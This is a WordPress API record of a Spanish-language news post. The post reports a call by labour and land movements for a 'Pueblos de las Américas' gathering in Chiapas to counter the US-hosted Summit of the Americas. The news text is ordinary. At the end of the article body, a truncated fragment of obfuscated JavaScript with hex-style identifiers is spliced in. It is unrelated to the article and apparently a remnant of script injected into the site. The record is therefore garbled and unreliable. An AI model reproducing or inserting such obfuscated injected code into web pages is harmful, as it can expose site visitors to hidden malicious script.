{"id":2346,"date":"2022-05-25T03:50:36","date_gmt":"2022-05-25T03:50:36","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=2346"},"modified":"2022-05-25T03:50:37","modified_gmt":"2022-05-25T03:50:37","slug":"chiapas-sera-sede-del-encuentro-de-los-pueblos-de-las-americas","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=2346","title":{"rendered":"Chiapas ser\u00e1 sede del Encuentro de los Pueblos de las Am\u00e9ricas"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"259\" height=\"194\" data-id=\"2347\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/05\/WhatsApp-Image-2022-05-24-at-4.24.58-PM.jpeg\" alt=\"\" class=\"wp-image-2347\"\/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"640\" height=\"360\" data-id=\"2348\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/05\/WhatsApp-Image-2022-05-24-at-4.24.58-PM-1.jpeg\" alt=\"\" class=\"wp-image-2348\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/05\/WhatsApp-Image-2022-05-24-at-4.24.58-PM-1.jpeg 640w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/05\/WhatsApp-Image-2022-05-24-at-4.24.58-PM-1-300x169.jpeg 300w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez<\/p>\n\n\n\n<p>San Crist\u00f3bal de Las Casas. &#8211; \u201cEs un intento por aislar y sancionar a estos pa\u00edses por tomar una ruta soberana, en contraste con las pol\u00edticas que Estados Unidos impone a la regi\u00f3n. Lo anterior ha provocado que pa\u00edses como M\u00e9xico, las naciones caribe\u00f1as agrupadas en el CARICOM, Bolivia, Argentina, Honduras, entre otros, hayan mostrado su desacuerdo con esta exclusi\u00f3n, expres\u00e1ndose el desgaste de los mecanismos de control de Washington y la p\u00e9rdida de la hegemon\u00eda imperial en el continente\u201d. Lo anterior es como justifican la Plataforma de la Clase Obrera Antiimperialista -PCOA-, El Movimiento Social por la Tierra -MST- de M\u00e9xico y la Central Bolivariana Socialista de Trabajadores -CBST- de Venezuela, el Encuentro de los Pueblos de las Am\u00e9ricas, que tendr\u00e1 lugar los d\u00edas 7 y 8 de junio, en el municipio de Chicomuselo, tras emitir su convocatoria. En un escrito explican que, del 5 al 10 de junio, a convocatoria del Gobierno de los Estados Unidos, se realizar\u00e1 en Los \u00c1ngeles, California la llamada Cumbre de las Am\u00e9ricas. \u201cEste evento ha tenido como finalidad reunir a los jefes de Estado y de gobierno del hemisferio para respaldar la agenda pol\u00edtica y econ\u00f3mica del imperialismo norteamericano, pero en esta ocasi\u00f3n el Gobierno de Biden ha excluido a Venezuela, Nicaragua y Cuba\u201d. Consideran que frente a la Cumbre de las Am\u00e9ricas su agenda olig\u00e1rquica y capitalista, \u201ces necesario que se impulse una respuesta pol\u00edtica desde nuestros pueblos, que coloque la agenda popular y las aspiraciones de democracia, justicia, igualdad, equidad, independencia, soberan\u00eda y libre determinaci\u00f3n, que exprese la voluntad de cambio de millones de mujeres y hombres en el Continente que demandan una vida mejor y el fin de la explotaci\u00f3n, el despojo y el saqueo\u201dLos temas a tratar son: Frente a la Cumbre de las Am\u00e9ricas: Por una integraci\u00f3n desde los pueblos. Los derechos laborales, sociales, agrarios, migratorios y pol\u00edticos son derechos humanos. Defensa de la madre tierra, el territorio y la biodiversidad. Contra la militarizaci\u00f3n y criminalizaci\u00f3n de los movimientos sociales. \u201cDe igual modo llamamos a participar en la Cumbre de los Trabajadores de las Am\u00e9ricas que se realizar\u00e1 del 10 al 12 de junio en Tijuana Baja California y que es parte de esta jornada\u201d, finaliza el comunicado. <\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez San Crist\u00f3bal de Las Casas. &#8211; \u201cEs un intento por aislar y sancionar a estos pa\u00edses por tomar una ruta soberana, en contraste con las pol\u00edticas que Estados Unidos impone a la regi\u00f3n. Lo anterior ha provocado que pa\u00edses como M\u00e9xico, las naciones caribe\u00f1as agrupadas en el CARICOM, Bolivia, Argentina, Honduras, entre otros, &hellip;<\/p>\n","protected":false},"author":2,"featured_media":2348,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-2346","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/2346","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2346"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/2346\/revisions"}],"predecessor-version":[{"id":2349,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/2346\/revisions\/2349"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/2348"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2346"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2346"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2346"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}